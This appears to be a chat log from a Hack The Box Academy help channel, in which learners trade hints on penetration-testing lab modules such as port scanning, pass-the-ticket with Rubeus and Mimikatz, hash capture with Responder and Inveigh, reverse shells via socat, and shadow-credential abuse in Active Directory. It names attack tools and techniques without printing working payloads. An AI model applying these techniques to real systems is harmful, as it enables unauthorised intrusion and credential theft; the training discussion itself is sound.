nc -nv

why did you only scan the top 10 ports

i scanned -p- after that

wait

let me try

it takes a lot of time is that normal @safe star

yeah nc all the ports and wait like 10 secs

sudo nmap 10.129.113.255 -p- -sV

oh nc?

yeah these .

so nc -nv -p-

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
31337/tcp open ftp ProFTPD

on these

just like how u were doing before

i already did

it just establishes a connection and doesnt show me anything else

wait a few secs on each one

22 port [tcp/*] succeeded!
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7

then it doesnt show me again the command type bar thingy, to write again i gotta press ctrl+c

then move on

Connection to 80 port [tcp/*] succeeded!w

dont send your output each time

come back after you tried them all

+OK Dovecot (Ubuntu) ready.

139 port [tcp/*] succeed

143 port [tcp/*] succeeded!

• OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LOGINDISABLED] Dovecot (Ubuntu) ready.

port [tcp/*] succeeded!

31337 port [tcp/*] succeeded!

SIR YES SIR, idk what to do now

is it the port 143 my flag?

did you wait for 31337?

bruh

3 whole hours and i had to wait 10 seconds on a port ive already scanned

thank you for being so patient with me lattice

see ya @safe star

I solved my problem in the first question of the skills assessment, which was a mistake on my part in the format to be returned. All that's left is the problem of the build number.

can you guide me a bit?

Is anyone able to give me a nudge for the final question of the skills assessment on dacl attacks 2? Iv missed something in my enumeration and iv spent a week trying to identify where the gap is. A point in the right direction would be appreciated.

Yes no problem, in the first question of the skills assessment the answer must be given in the format /firstFolder/SecondFolder/appFolder and above all do not add a / at the end.

The path is also listed in the “Android Debug Bridge” section.
I hope it's a bit clearer

Nudge would be great

@night escarp yeah it made situation clear

could you please help me with this?

google variable scopes or read the section carefully

I already did it

Btw I was doing completely the same just was missing com in the beginning

did you find the uid of the application in the second question?

yeah, did you run the ls -l command on the com.android.settings full path ?

I had mistakes cause i was missing com as well here will try ones more now

@cunning obsidian

The basis of the path is the same as in the previous question

yeah i got it and I got the output now and what is uid I have to insert only numbers?

system and numbers or there is a need to pull the file?

just system is fine 🙂

yeah done

the third question where to find the build model?

what do they mean in it?

do they mean code template which opens when i run device?

it's literally the same thing as for the build number question, but here it's the build model (first part of the text in the build info of your emulated Pixel 3a).

It asks you to create the app, but if you're lazy you can just look at the build info directly.

they mean name of the device right?

exactly

yeah it worked

I tried to sign the application as they showed but it throws me a mistake all the time I went to build and tried to generate a bundle and was getting mistakes all the time

in the last question

I also had problems, I was able to solve them by googling “how to manually sign apk's” and I found a medium blog that explained well using jarsigner.

will check tomorrow I btw checked this application in one service and it says it has some bugs in the code or something cause android studio is refusing to read this application

thank you so much for guiding))

Hey guys, I'm currently going through the Password Attacks module, specifically the Pass the Ticket (PtT) from Windows section. At one point, we're shown how to convert a .kirbi file to Base64 format to use with Rubeus, instead of passing the .kirbi file generated by Mimikatz.

Is there a practical reason for doing this, or is it just to demonstrate that it works?
Are there situations where Rubeus can't read .kirbi files directly and we can’t dump the Base64 tickets, leaving us with the only option to convert the file first?

I understand we could reduce the forensic footprint and avoid file-based injection by passing the Base64 key directly, but that would only make sense if we don't generate the .kirbi file in the first place, right?

Am I missing something, or was it indeed just for the sake of the demonstration?

I’m aware it’s a Tier 1 module, but I don’t think I’m giving up too much as it's more of a tangent. If I am, please feel free to delete. 😅 👌

Normally you don't need to put it in android studio but if you prefer

No prob :), ping me gladly if support answers your question about the build number.

can i add you to friends? cause it will be easy to ping

I usually use the base64 on Linux with ticket converter if I can’t transfer the kirbi file easily

🙏🏻🙏🏻🙏🏻

This channel is dedicated for talking about the various modules in HTB's Academy platform. This question is better suited for something like #general. Please read and follow the instructions in #welcome to gain access to #general as well as most of the server.

I can't write there

I provided instructions on how you can reach the channel in the post you're responding to.

I see , i don't have a htb acc

Then you'd need to create one.

My country is banned

but maybe you can help me, a good deed is always valued. Can i ask u the question privatley?

No, sorry, you'll have to reach out to support on the site. Nothing I can do.

Ok🙏🏻😕

I am stuck on AD Administration: Guided Lab Part II.
I can't rdp to ACADEMY-IAD-W10. It said the credentials for use to login:

User == image
Password == Academy_student_AD!

I don't think the credentials is correct.
https://academy.hackthebox.com/module/74/section/1393

ensure that the password is between single quotes: ' as the ! is a function in bash

Either that or alter your network interface MTU

But I can login to ACADEMY-IAD-DC01 with credentials htb-student_adm: Academy_student_DA! (without any single quotes). I just don't believe the username for ACADEMY-IAD-W10 is image.

can i get help for labs here?

im stuck on a stupid error step

Only module help here

Labs = #boxes or more recent ones like #1360673885376483378 have a dedicated channel. Get access by verifying your account

Please read #welcome and #rules it will explain how to get verified

Hi everyone, I guess new module is dropped by HTB Android App Static Analysis

I'm currently on the nmap module and having an issue submitting the answer. I know the answer is correct but its not accepting my answer. Can someone troubleshoot this?

check for spaces before answer or appending spaces (mostly its coz of that)

Already checked that. No spaces.

whats the submodule? and question no?

Nmap Scripting Engine

Question: Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer

Module (Command injections) {Evasion Tools}
not getting bashfucator.sh nor /bin folder (in /bashfuscator/bin/) for some reason
P.S - Followed module steps and installed properly

This module is in the cpts course

did u tried nmap script?

Yeah, I found the flag. When I input the flag for the question, its not accepting it

is your flag in this format ? - HTB{flag_value_here}

Yes

dm@weak epoch

I just finished the "Setting Up - Linux" portion of the Infosec Foundations module. Now I'm on the Windows setup section. I am confused on how to proceed. Will I be getting a new ISO then booting up a new VM just like in the Linux section? This link https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/ was introduced in the instructions but it appears there is an ongoing issue "Due to ongoing technical issues, as of October 23, 2024, downloads are temporarily unavailable."
Should I install everything manually?Ty in advance

it's not written poorly, at all, it's bouncing between them to show how to perform the same queries across the different implementations (mssql and mysql) to show syntactically how to query in each

afaik that download has been down for a while, you can just create a windows vm from an iso image

/feedback if you have an idea on how it can be better; but most people don't have the issues that you're stating are there. maybe it's just not structured in a way that works for you

i.e. start with one mssql => discuss enumeration/etc; then mysql => discuss enumeration/etc.

Hi guys, im currently on AD Enumeration & Attacks - Skills Assessment Part I
||i have question about the "Find cleartext credentials for another domain user. Submit the username as your answer."
I've rdp to the machine, running mimikatz and dump logonpasswords but i cant seem to find the clear password :/||

try multiple different techniques; but iirc sometimes it's staring you in the face and you overlook it

Alright.ty 🙂

Guys, I got stuck on the last question in Android - Sign the application myapp.apk and install it by either dragging and dropping it onto the device or using ADB. Make sure to first uninstall any previous versions of the app. After installation, tap on the app to start it. What is the message printed on the screen?
I loaded it on a virtual drive, but the text it gives when it starts is not the correct answer. Can anyone share some guidance?

Theres a registry setting you have to change to get it

You have to restart the machine for it to apply

Hello colleagues I have a question in the cross site scripting module in the phishing section I have a vpn connection file I do not understand why at the bottom I have another file if I have the academy-regular.ovpn and the help indicates that the key is already installed in the workstation.

the availability to download the vpn connection is just there; you don't have to download it again or anything like that

Is it only to reinstall the file and connect?

"reinstall" isn't really the right word tbh

as it's not really an "install" file

it's just a configuration file

it's just to be able to download the file again/change vpn regions

I am doing the exercise as indicated in the phishing section in the XSS module but at the time of sending the url in phisnihg/send.php tells me that there is a problem to send it, I try it in another browser tab and I can view it normally then send the credentials if to see if I can capture and display them in the file creds.txt, the issue is that when I send it tells me that there is a problem and does not send me the credentials to access the flag.txt

This may not be the channel for this but I was wondering if HTB was looking into an exploit development certification.

This is already available for web exploits.
Certified Web Exploitation Expert (CWEE)

I meant along the lines of say an OSED or OSEE type of exam. I should've been more specific.

Take a look at the modules in the Academy.
A job role path for AI Red Teamers has already been published. More modules are sure to follow.
Several modules on WiFi hacking have also been created and published. There may be a path for this soon as well.
Additional modules for Blue Teamers and, new, modules for Android hacking have been published.
I haven't seen any modules for something like OSED lately. But that doesn't mean there won't be something like that at some point.

There's buffer overflow and assembly modules so the capability is there to make an exploit development style exam.

Hi. I have a question about publishing some content of the modules.

I'll provide some context.
I want to have a website for all of the documentation of all the Courses / Projects I make, no matter the platform.

I've started the module "Introduction to Active Directory", and as documentation, I'll probably want to copy and paste some of the content of the module, not everything obviously.

As my documentation will be publicly available, am I allowed to do what I mentioned (copy and paste some of the content)?

I hope some mod / admin can answer this to be clear.

Thanks!!

Have a good life...

You can publish only module of the first level if you publish something higher htb will block your content

These modules were published between the end of 2020 and mid-2021.

Is leaking the modules is legal?! 🗿

Well, the contents of the modules are protected by copyright and may not simply be copied and published. An exception may be made for some Tier 0 modules. Please contact support.

I did that, while I wait for it's reponse I asked here

Most of us mods are not HTB staff, but volunteers. 😉

no

// why I can't reply at general chat ?

Gotta identify your account, instructions --> #welcome

You can publish walkthroughs of Tier 0 modules. However, you cannot publish the module content itself.

thanks for clarifying i knew that one could publish walkthrogh but not the content itself but didn't remember what tier

Anyone knows why that is happening ?
I even restarted both the Pwnbox
and I restarted the Target(s): 10.129.78.33 (ACADEMY-EA-MS01)

Nothing really works....

I'm working on "Attacking Session Tokens" in the "Broken Authentication" module. I'm trying to get the application to issue me multiple session tokens, but I'm only ever able to get it to issue the same thing over and over again. I'm just logging out and back in a couple of times.

I can only ever get the same session token out of this web app... I have no idea what to do with that.

Hi. I have just finished the AD Enumeration & Attacks module, great stuff. The thing is that I couldn't understand why the first (||AB920||) user's hash could be captured using ||responder||, but not the third (||CT059||) user's hash. For that one I had to use ||Inveigh|| from ||MS01||. What's the difference between the tools?

I am stuck at the skill assesment of the File Upload Attacks can anyone help

Anyone at the level of solving the bug bounty path? lets talk and solve collaboratively

Inveigh is typically used when you only have a windows host. In your case the MS01 host. Since nothing was talking to your Linux jumpbox you couldn’t capture that hash. But since things are talking to your MS01 host. Inveigh could do its thing.

in the easy ips firewall lab, i tried finding the OS "Our client wants to know if we can identify which operating system their provided machine is running on. Submit the OS name as the answer."

I think i found it but its not correct help

Hi I found the module HTTPS/TLS Attacks -> Padding Oracle Attacks -> What is a Bleichenbacher attack? super interesting!

To understand the attack better, I wanted to create my own lab machine, however I've been struggling to create a setup that's vulnerable. After reading the paper, it seems openssl is not vulnerable to the attack.

Can anyone point me towards how I can setup my own lab machine that is vulnerable to the Bleichenbacher attack?
My current idea is to write a TLS server in a vulnerable Erlang version, however that seems like a lot of work and I wonder if I can have it simpler.

It makes sense. Thank you

I might just never have noticed this before the Academy module "Linux Privilege Escalation", but does the Bash terminal (on PwnBox?) go "deaf" if the host I'm ssh-ed into times out? As in, I cannot type anything anymore (not even to just "exit" to go back to my main shell), so I have to close the window and open another terminal. Time-out is my guess because I have to "spawn target system", which might also be because the targets in the sections vary from time to time

might be better to base64 atp

This way should technically work also, no?

Yeah probably but it way harder to find errors

But yeah if you want the challenge go for it

I’m okay Josie, don’t want to join your kink cult

Never that, you should join and find instead of judging off nothing

also i think this falls apart at the pipes

hello

Hmm, maybe. I’ll try to encode it later. Too tired right now

AND GOODBYE

yeah it only runs the find command but you cant really pipe to grep

Noted for next time, thank you

Don't advertise here.

No. This discord isn't about that it's about Hack The Box's various platforms.

edge lord

I need help on file upload attacks skills assesment idk, its get request i dont even see the file content i am uploading i don't get how it works

any hints

You can DM how you executed it, but it shouldn't be anything crazy.

Were you ever able to figure this out? I am getting the same error and have tried reinstalling everything i can think of, chmoding to add permissions, copying all of the needed files to a working directory...still stuck.

Try running with sudo

i've tried running everything with sudo. i've moved all existing files to backup and reinstalled everything. this oracle tns module is very frustrating.

Instead of the apt install, install from source

Idk if the section still has the instructions for it

I've used the script provided that included cloning the git, but it's somehow not resulting in it actually getting installed. i really am not sure. I've now also cloned from the git directly, still no joy.

Hello all. I am currently stuck on Web Attacks - Mass IDOR Enumeration
As I am following along, no matter what I do I can't seem to get another uid to show other files, and the files that are accessed by default are empty. Not sure what to do

Hi,
in the code analysis section of the into to malware analysis module.
how did we know that HKLM is being pushed to rcx? and isn't rcx supposed to pass the 4th argument ?

http://6.s081.scripts.mit.edu/sp18/x86-64-architecture-guide.html

depends on the calling convention

i think majority of winapi functions go from right to left

thx for the info, i also found this comment regarding the order of the registers
https://www.reddit.com/r/asm/comments/1g0j2m6/comment/lr956dh/?utm_source=share&utm_medium=web3x&utm_name=web3xcss&utm_term=1&utm_content=share_button

https://learn.microsoft.com/en-us/cpp/build/x64-calling-convention?view=msvc-170&viewFallbackFrom=vs-2017
but about the values, I'm still not sure how do we know that HKEY_LOCAL_MACHINE is being pushed to rcx.

thats just the value each registry key has

https://learn.microsoft.com/en-us/windows/win32/sysinfo/predefined-keys

thanks for the help <3
i understand it now

I am doing socat redirection with a reverseshell section and it says it started reverse handler. However, I don't see a connection establishing. is there a reason for this? It said started a reverse handler. Does that mean it connected and I did the section right?

and why is a shell not loading?

the tool used on the target I'm logged into via SSH is working

there's no error it says "started reverse handler" but no shell loads I just end up sitting there waiting for a reverse shell

I have a screenshot if someone wants to see. I can show you there's no error.

but no reverse shell

hold on wait I think I know what to do

no wait that didn't work

I checked on the target host and the payload didn't download

so I'm thinking I did something wrong

Anyone who has completed the Windows Lateral Movement. How did you complete task 2, "what's the content of the flag located at C:\users\arturo\flag.txt"

I've got a rdp to the jump host going and I think I'm supposed to get into wsus.inlanefreight but it's blocking all connection winrm, smb etc.

I am stuck on this : an Android question in the academy : "Applications created using frameworks like React Native, Apache Cordova, and Ionic might also be susceptible to what type of attacks, compared to native applications? (Format: 1 word) " tried everything, likely a caps issue, any clue for the direction ?

Quick question. How come I have unlimited instances even though I don't have an active membership? I mean, I like it and it’s very helpful, but I’m just curious.

because you gave HTB money at one point in time

Yes, many times

Alright, this makes sense

that's literally the reason sorry if that came off a bit cheekier than intended

you'd have unlimited iirc if you bought cubes, for example

No worries at all. I appreciate your quick response as always 🫶

Hmmmm, I better go fix that

🙊

(joking, it's intentional)

Haha, how are you? Do you remember me?

Honestly, and sorry.,. but I cannot

I'm ok thank you, how're you?

I'm terrible with names and faces most of the time

Some stick, some just don't

Please don't take it personally 🙂

We talked 2 or 3 months ago. I even added you on LinkedIn. Back then, you said you’d ask a colleague out of curiosity about what happened to GHS, the Greek Hacking Scene. I’ve been offline for a while due to too much work and a recent promotion, but now I’m back and working on getting my CPTS.

For the prompt injection attack - skill assessment just got the flag. If anyone is struggling, feel free to DM me 😄

Ahhhhh, I did check my DMs but nothing came up

Yes, ch4p did respond, one sec

Didn't say much though

Haha no worries, it's normal, you talk with with thousands of people here ❤️

He said he knew some of the pf guys.. then said a name.. then said that wasn't the name.. then said whoever it was used to organize AthCon.. then said they'd find the name

...then nothing after that

🤣

Haha, it's fine, all good, I was just curious, nothing "important"

Thank you!

No worries, hope all is good your end 🙂 Happy east if you are celebrating

..er

Easter

Same to you! Everything is fine, thank you, hope the same on your end! Finally I've got the time to study ❤️

I moved to the InfoSec team in my company with a focus on AppSec and pentesting, so I definitely need the knowledge of CPTS and the certificate itself

Awesome 🙂 I gonna go get some lunch/breakfast/whatever, back in a bit. We can swap to #general to keep this channel on topic if we hook up later. Have a good one 🙂

Enjoy! Clear!

1. In the module they talk how you can also use IPv6 instead of IPv4. 2. Maybe the port is different from the default one and maybe it was shown in module itself.

I've been using linux for a few years (also to manage a homelab) and decided to try academy, much on the command line and am surprised that I still learned quite some commands/concepts in the linux fundamentals course, it's not just a course where the free module only teaches cd, ls, cat etc

Hi. i am stuck at this question on the HTB android fundamentals and would appreciate some help for this question.

question: "What is the name of the function that returns the string inside the cpp file? (Format: FunctionName())."

I answered "stringFromJNI()" but it wrong.

Read #welcome and then ask in #careers-and-certs

did u find solution

hey im stuck on pivoting from srv02 to dc01 in winrm module

im generating a new ticket with rubeus

but no luck

Can try the part in that section that covers winrs.

@gray yacht

You can just DM

kk

can someone help me? im on the IDS IPS evasion module - easy lab

I have PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
10001/tcp open scp-config
and need to figure out what operating system the machine is running, i tried an nmap scan with -O and checked the packet tracer on the port 10001 but i cant seem to figure it out :/

In the attacking common services module it says "If we get administrative privileges on a machine, we can extract the SAM database hashes"

but in a diff module it says only SYSTEM level privileges can access the SAM database

sooo which one is it? it also make it confusing bc idk what's true

Sometimes services may reveal stuff within their versions

i passed that already

THANK YOU SO MUCH FOR THE RESPONSE

im on the hard lab now and... let's just say it lives up to his name

It's easier than you think; reread the related section and look around for stuff related to source port

im sorry could you specify the section?

source port... got it

no i dont

The section related to the name, ids/ips evasion

thank you MarcieLeeee

wait if I get "found out" how long until i can retry again?

It's like a 10 minute timeout (or you can just reset the lab)

yeah thanks a lot!

Hello
I have been stuck on file inclusion skills assessment for quite some time now
I tried:
Bypassing with basic methods (..../ etc') and encoding the payloads.
Bruteforcing parameters but didnt find anything other than the page value.
running http server on my host and include the URI in the web parameter but also didnt get any response
Also tried using PHP wrappers to get a web shell
Can i get a nudge?

Guys I am on /module/147/section/1322 and I don't see where is this password for Kira?

I believe you obtain it from a previous section

It says use the "cracked password for Kira" but it is nowhere to be found.

Alright thanks, I will have a look.

I did CTRL+F and it doesn't say Kira anywhere

well you get the pass somewhere in the module, i don't remember exactly which section

Ok what about this section /module/51/section/1777, I am inputting the Python version as I see it on the box and it won't accept my answer.

And the answer is as clear as day on the machine

I tried it PythonX.X.XX and I tried it X.X.XX and even X.X but none of those answers worked.

I even tried pythonX.X too and still the same problem.

Never mind

Hello everyone.
I completed the module Android Fundamentals but in the Application Frameworks section, there's the last question which I honestly can't find the answer in the section itself.
The question is: "Applications created using frameworks like React Native, Apache Cordova, and Ionic might also be susceptible to what type of attacks, compared to native applications? (Format: 1 word)"

I've also not sure about the format, do I use a literal number 1 or does this mean exactly one word and nothing more? Reverse engineering is the term that most shows up but I've honestly tried everything in the section. Is the answer in another section I might have missed? Thank you guys.

where is the open option in Exploiting Web Vulnerabilities in Thick-Client Applications: Clicking on the FileBrowser -> Notes.txt reveals the file security.txt. Literally no button for that

Did it long time ago, but right click? Sorry if that doesn’t work

Nope this is soo stupid

hi friends i'm new to this and on the module for infosec in the knowledge check. i got my foothold and found the users.txt file and i need to privesc. i did sudo -l and shows php can be run with sudo privs. do i do a php file upload am i on the wrong track?

https://academy.hackthebox.com/module/77/section/859

A few days ago i reached the end of the CPTS path. Just wanted to say thanks to all the community in here!

Whenever i had a question, i could find the answer in here.
Right now im preparing to take the exam first week in may! Looking forward to it.
Thank you once again.

you're gonna kill it i believe

anyone know this?

nvm i used gtfobins thanks team

The module itself is a walkthrough. You can check out a similar machine by ippsec on the same. That might make it more clear

so the open button is obfuscated I'm confused this is a simple instruction: "We can read its content by clicking the Open option at the bottom of the window."

There's no open option in my box

did you have a open button when you did this lab?

Yeah

was it hidden at first?

I have forgotten. I checked the walkthrough by 0xdf and he seems to be having that option. I don’t know if I can paste links here

Does a high school email count for a student plan

Make the window bigger

Reach out to support

I'm in shells & payloads - the live engagement. After creating a payload with msvenom, it's created as a zip archive with many files and folders inside. Which one of these am I supposed to use?

hi guys, I mentioned an issue I had earlier last night I'm wondering if anyone could help me out with this right now. I have a screenshot to prove no errors.

but I can't post here without spoiling

The whole archive is the payload

It doesn't have to be deflated?

Spoilers

But google what the file extension stands for.
But also: make sure the LHOST is correct, you're on a foothold machine after all

thanks

In the Linux Privilege Escalation module, I was trying to download an exploit on the target I was ssh-ed into straight from git using "git clone https://github.com/[full URL]"
I got the error "fatal: unable to access https://github.com/[full URL]: Could not resolve host: github.com"
I found the source code for that exploit elsewhere and just created a new file, but was wondering why git didn't work here?
Not sure if I can post the specifics here as it was part of the exercise

The targets don't have internet access

wait, for real? ^^'

hold on, actually according to the writeup it WOULD have worked with wget, but a different URL
wget https://raw.githubusercontent.com/[full URL]

You download to your machine then transfer to target

Oh right!

Yes, my bad, that download happend outside of ssh..."download to the attack host", would help if I could read xD

Well, copy paste worked as well 😅

@fathom pendant I've tried making my lhost the 172.16, and the 10.129, I get the same error page for both: HTTP Status 500 – Internal Server Error. Nothing connects to my listener on the foothold machine.

172.16 seems to make more sense since it's the same subnet as the target.

Hey guys I'm stuck on the file inclusion module, the lfi and file upload section, I found a way for RCE but I can't read the flag, I found the awnser online but idk how they get it, I can do RCE but when I cat the flag nothing want to be displayed (yes the file name is good) any help?

hi so can no one help me with the section I'm working on today?

I understand its Easter but should I come back tomorrow?

Honestly you shouldn't rely upon the help of others when working through modules

Someone may help, they may not

Ultimately the purpose is to work through it on your own, but some may reach out to provide a nudge or gentle guidance

I know. I have been. Ok I will just come back to it when I have more energy.

So tomorrow I will try again. But ya point taken.

I will just keep trying to complete it on my own.

It feels like one of those things where I'll keep trying and suddenly see it a few days later so ya.

I may just reread all of the previous sections in this module. Its been a while since I did them.

I know.. it's frustrating

Try not to get hung up on one signular task

What do you mean "hung up?"

Your brain will keep on working, even if you're not focusing on it

As in.. if you feel like you're getting nowhere, keeping on trying even if you're not moving

Better to put it aside and go for someth ing else

Let your brain work on it, while you work on something else

Ok. Agreed. Will do that.

Ok, so would it be better to work on something else today then tomorrow reread the previous sections in the module and take notes again tomorrow?

I already have notes but I just I want to understand it. This feels like something where when I understand what I'm doing I'll get it.

What you trying to do?

this one section in Socat Redirection with a Reverse Shell section. I answered the true or false question already but I want to follow the instructions in the section to replicate the attack they are giving me and I'm having trouble.

I think I am gonna take g0blin's advice and try again tomorrow

I think this is some easy thing where once I understand what I'm doing it will click.

there's a lot of factors like is there a firewall between you and the machine are you forwarding from HOST A -> SSH -> to your machine ?, if its just ssh -D 1080 should be enough, but tunneling should always check if you can reach those ports like your socat from HOST A should be redirecting to the SSH ip and not your BOX IP because think of your jumping host (SSH server you compromised) as a router

@zinc swift please don't post flags

sorry i didn't know. what part am i supposed to submit from that because it's not taking my answer

nvm i eventually got it deleting stuff

HTB{randomstuffhere} for my own future references thanks team

Okay, yeah format should be like HTB{xxx}

like think of subnets as houses and LAN as rooms in this houses to access this LANS you must ask the landlord to get you there

Discuss all modules here, from the fundamentals to the really mentals, but do not spoil module content over Tier 0.

That kinda thing

😄

What host is running "Microsoft SQL Server 2019 15.00.2000.00"? (IP address, not Resolved name) from the Active Directory Enumeration&Attacks(Initial Enumeration of the Domain)...i only got 2 live/active hosts but none have that service...any idea of what/where i might be mistaking?

Did you try all the various methods they showed?

Yes i did all from their examples

You could restart the target or change servers/regions if you think it's the target.

Make sure you are following all of the instructions for finding hosts, sometimes there is key information you may miss. Maybe give the section another once over.

is it possible to use a ticket in my session to use whisker again?

like lets say i use asktgt to get a ticket as a user and i want to then use whisker

so attack using my kerberos ticket

i just finished the LFI skills assessment and my god that was hard
Something weird happened with one of the files but after i restarted it worked

anyonek now?

You need system rights but very often Administrator has SEImpersonate anyways so Admins usually can just dump them (given you impersonate System)

also SAM is only for LOCAL accounts

You want to run a Shadow Cred twice with different users, is this it?

kinda

it doesn't really matter

im user A and i asktgt /ptt as user B

can i do shadowcreds as user B

or does whisker not utilize kerberos tickets like that

This

Most of Windows Tools will use Kerberos tickets to list your permissions

You can run Rubeus to gain a TGT as whichever user you need and then run Whisker as this user

yeah but it didn'tw ork today i had userA -> genericall -> userB -> addcredentialkey -> user c

i did whisker -> rubeus tgt then -> whisker to user c

it did not allow me (acces denied)

What exactly did you attempt running?
Cause with the GenericAll you can change user B password and start a CMD session with “Run as a different user”. Then run Whisker on user C.

i mean with the hash i ccan do a lot of things, i ended up just using pywhisker with the hash and it worked

but i thought it was annoying that it didn't work with rubeus asktgt /ptt

Totally understand. Hate pywhisker. You can run Certipy’s shadow auto. It will do stuff easier